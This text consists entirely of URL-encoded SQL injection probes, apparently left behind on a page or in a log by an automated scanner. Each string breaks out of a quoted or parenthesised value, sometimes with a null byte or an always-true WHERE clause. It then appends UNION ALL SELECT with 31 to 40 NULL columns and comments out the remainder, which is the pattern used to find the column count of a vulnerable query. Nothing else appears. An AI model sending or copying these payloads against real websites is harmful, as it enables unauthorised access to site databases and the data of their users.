1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%207083%3D7083%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%209434%3D9434%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%209008%3D9008%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208247%3D8247%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%202208%3D2208%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%204056%3D4056%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%206540%3D6540%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%205608%3D5608%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%209216%3D9216%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208171%3D8171%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%208345%3D8345%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%202404%3D2404%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205451%3D5451%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%201966%3D1966%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207818%3D7818%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%202303%3D2303%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%201807%3D1807%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%209866%3D9866%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%201634%3D1634%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205327%3D5327%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%205301%3D5301%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%201317%3D1317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%205792%3D5792%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208949%3D8949%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206037%3D6037%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203251%3D3251%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204162%3D4162%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%201172%3D1172%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206681%3D6681%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 